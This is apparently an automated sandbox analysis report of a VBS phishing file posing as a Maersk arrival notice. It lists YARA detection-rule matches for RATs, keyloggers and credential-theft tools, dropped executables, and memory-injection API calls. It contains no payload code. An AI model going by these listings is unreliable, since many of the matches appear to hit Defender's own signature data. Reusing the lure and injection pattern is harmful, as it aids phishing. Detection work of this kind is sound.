Source: 38.3.MpSigStub.exe.138bde736d2.82.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bde736d2.82.unpack, type: UNPACKEDPE	Matched rule: Detects ISMDoor Backdoor Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bceeeac2.66.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from DrqgonFly APT report Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: Detects ROKRAT malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: gh0st Author: https://github.com/jackcr/
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: NetWiredRC Author: Jean-Philippe Teissier / @Jipe_
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: Detects ROKRAT malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: gh0st Author: https://github.com/jackcr/
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: NetWiredRC Author: Jean-Philippe Teissier / @Jipe_
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: Detects Pupy RAT Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: Detects Arid Viper malware sample Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: Detects ROKRAT malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: PoisonIvy_3 Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp, type: MEMORY	Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects unspecified malware sample Author: Florian Roth
Source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000026.00000003.18345693514.00000138BE774000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000026.00000003.18352509630.00000138BD16D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Tofu Trojan Author: Cylance
Source: 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PoisonIvy_3 Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp, type: MEMORY	Matched rule: korlia Author: Nick Hoffman
Source: 00000001.00000003.14714384382.000002DEA1411000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: 00000026.00000003.18324581744.00000138BDC1C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000026.00000003.18316462962.00000138BD524000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: 9002 Identifying Strings Author: Seth Hardy
Source: 00000026.00000003.18357503095.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, type: MEMORY	Matched rule: gh0st Author: https://github.com/jackcr/
Source: 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000026.00000003.18309314406.00000138BD524000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000026.00000003.18357864029.00000138BE774000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Crypto Miner strings Author: Florian Roth
Source: 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects export from Gold Dragon - February 2018 Author: Florian Roth
Source: 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CVE_2018_4878_0day_ITW Author: unknown
Source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 00000026.00000003.18346478440.00000138BD16D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Tofu Trojan Author: Cylance
Source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Webshells Auto-generated - file vanquish.exe Author: Yara Bulk Rule Generator by Florian Roth
Source: 00000026.00000003.18339341305.00000138BE774000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 00000026.00000003.18290586958.00000138BE774000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000026.00000003.18350554191.00000138BE7D2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: 00000026.00000003.18300875514.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 00000026.00000003.18321311969.00000138BE145000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Keylogger component Author: Microsoft
Source: 00000026.00000003.18321311969.00000138BE145000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 00000026.00000003.18305388995.00000138BD315000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Detects Tofu Trojan Author: Cylance
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Keylogger - generic rule for a Chinese variant Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Unidentified Implant by APT29 Author: US CERT
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Webshells Auto-generated - file vanquish.exe Author: Yara Bulk Rule Generator by Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: 9002 Identifying Strings Author: Seth Hardy
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: gh0st Author: https://github.com/jackcr/
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: gholeeV1 Author: unknown
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html Author: unknown
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: NetWiredRC Author: Jean-Philippe Teissier / @Jipe_
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: PoisonIvy_3 Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: CVE_2018_4878_0day_ITW Author: unknown

Source: Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs

Initial sample: Strings found which are bigger than 50

Source: AZTEKERNES.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCmdRun.exe.44.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCopyAccelerator.exe.44.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpDlpCmd.exe.44.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCmdRun.exe0.44.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCopyAccelerator.exe0.44.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpAsDesc.dll.44.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpOAV.dll.44.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpUxAgent.dll.44.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpAsDesc.dll0.44.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpOAV.dll0.44.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\System32\wscript.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Section loaded: edgegdi.dll

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe

File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdBoot.sys

Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe

File deleted: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\1.1.18500.10_to_1.1.18600.4_mpengine.dll._p

Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: String function: 00007FF7B57D0DB4 appears 56 times
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: String function: 00007FF7B582BAAC appears 36 times
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: String function: 00007FF7B57D0D88 appears 41 times

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FA6D2 NtProtectVirtualMemory,	5_2_022FA6D2
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAB15 LoadLibraryA,NtResumeThread,	5_2_022FAB15
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F5D74 NtWriteVirtualMemory,	5_2_022F5D74
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F91AF LoadLibraryA,NtAllocateVirtualMemory,	5_2_022F91AF
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FA67E NtProtectVirtualMemory,	5_2_022FA67E
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F5E52 NtWriteVirtualMemory,	5_2_022F5E52
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F92BD NtAllocateVirtualMemory,	5_2_022F92BD
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAEC6 NtResumeThread,	5_2_022FAEC6
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAB42 NtResumeThread,	5_2_022FAB42
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F5F89 NtWriteVirtualMemory,	5_2_022F5F89
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAB9E NtResumeThread,	5_2_022FAB9E
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAC0B NtResumeThread,	5_2_022FAC0B
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAC72 NtResumeThread,	5_2_022FAC72
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAC41 NtResumeThread,	5_2_022FAC41
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F6057 NtWriteVirtualMemory,	5_2_022F6057
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAC92 NtResumeThread,	5_2_022FAC92
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FACC6 NtResumeThread,	5_2_022FACC6
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAD8E NtResumeThread,	5_2_022FAD8E
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F91F6 NtAllocateVirtualMemory,	5_2_022F91F6
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F5DC7 NtWriteVirtualMemory,	5_2_022F5DC7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_00A0B35D Sleep,NtProtectVirtualMemory,	13_2_00A0B35D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_00A0B41D NtProtectVirtualMemory,	13_2_00A0B41D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_00A0B467 NtProtectVirtualMemory,	13_2_00A0B467
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_00A0B3B1 NtProtectVirtualMemory,	13_2_00A0B3B1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_00A0B418 NtProtectVirtualMemory,	13_2_00A0B418
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57DC444 NtQueryInformationProcess,NtQueryInformationProcess,FindCloseChangeNotification,CloseHandle,	45_2_00007FF7B57DC444
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57E5DB4 NtQueryInformationFile,NtQueryInformationFile,RtlNtStatusToDosError,	45_2_00007FF7B57E5DB4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57D9FF0 NtSetInformationFile,	45_2_00007FF7B57D9FF0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57E5B80 ReadFile,FlushFileBuffers,SetEndOfFile,NtSetInformationFile,	45_2_00007FF7B57E5B80

Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce283a.74.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcd0731e.140.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce283a.167.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce32d4.72.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce2d87.168.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce32d4.166.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce2d87.73.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_004013E8	5_2_004013E8
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_0040954B	5_2_0040954B
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F0E0F	5_2_022F0E0F
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F2293	5_2_022F2293
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAB15	5_2_022FAB15
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F5D74	5_2_022F5D74
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F91AF	5_2_022F91AF
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F3231	5_2_022F3231
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F8200	5_2_022F8200
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9E1D	5_2_022F9E1D
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F2293	5_2_022F2293
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F4E71	5_2_022F4E71
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F6E49	5_2_022F6E49
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F2A45	5_2_022F2A45
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F5E52	5_2_022F5E52
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F2A50	5_2_022F2A50
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9AA6	5_2_022F9AA6
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F328A	5_2_022F328A
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F1287	5_2_022F1287
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9E96	5_2_022F9E96
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9EEC	5_2_022F9EEC
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F82EB	5_2_022F82EB
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9EDB	5_2_022F9EDB
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9F03	5_2_022F9F03
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FA311	5_2_022FA311
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9F6E	5_2_022F9F6E
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F3346	5_2_022F3346
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAB42	5_2_022FAB42
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAB9E	5_2_022FAB9E
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9FFF	5_2_022F9FFF
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAC0B	5_2_022FAC0B
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F4C08	5_2_022F4C08
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F3415	5_2_022F3415
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9C6A	5_2_022F9C6A
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F3462	5_2_022F3462
